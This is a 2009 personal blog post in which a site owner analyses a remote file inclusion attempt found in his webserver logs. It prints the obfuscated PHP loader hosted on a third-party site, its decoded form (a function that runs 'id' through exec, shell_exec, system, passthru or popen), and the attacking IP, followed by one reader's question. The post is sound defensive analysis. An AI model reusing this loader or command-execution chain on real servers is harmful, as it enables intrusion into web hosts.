1337 v0pCr3w – heh

Posted on 11 May 2009

Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.

It was an attempt to remotely load the following URL on the Aanval.com primary domain:

http://oubkhammuseum.com/templates/idvop.txt

The content of the URL (in the event is gets pulled):

[code lang=”php”]$vopcrew = “pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=”;
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;[/code]

And of course, the decoded PHP version that they would prefer to have executed:

[code lang=”php”]$os = @PHP_OS;
echo “v0pCr3w”;
echo “os:$os”;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){

$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}[/code]

Essentially, it is an attempt to identify the current user the web process is running under. As you can see they create the function ex(), which contains a simple iterative if / else / else / etc statement to test as many possible avenues to execute the shell command “id” to provide this information.

A quick search around the net provided the little perl scanner tool used:

http://www.loyalmoses.com/junk/vopcrew_multiscanner.txt

The offending IP apparently belongs to HostMySite which owns a good sized net block:

208.112.87.9

OrgName: HostMySite
Address: 650 Pencader Drive
City: Newark
StateProv: DE
PostalCode: 19702
Country: US

Rather amateurish, but effective. 😉


1 Response to 1337 v0pCr3w – heh

  • gigi says:

    Hi,
    i have got same problem but this means that they have tried to download that file on my server or have verified that it was already on my server?

    Regards
    Gigi

  • Recent Posts

    Tag Cloud

    3D Printing Aanval App Apple Badger Mt. Beef book Calf Cattle Cows development Eclipse F-250 F-450 Flex Builder Ford Horse House Hunting IDS iPad iPhone John Deere King Ranch mac Moses Family Moses Ranch off-grid Offgrid Office Outback Property Ranch Reining Riding Security Snort Snow Storm tactical flex Tractor Trailer Truck VFX Weather

    Meta

    Loyal Moses is proudly powered by WordPress and the SubtleFlux theme.

    Copyright © Loyal Moses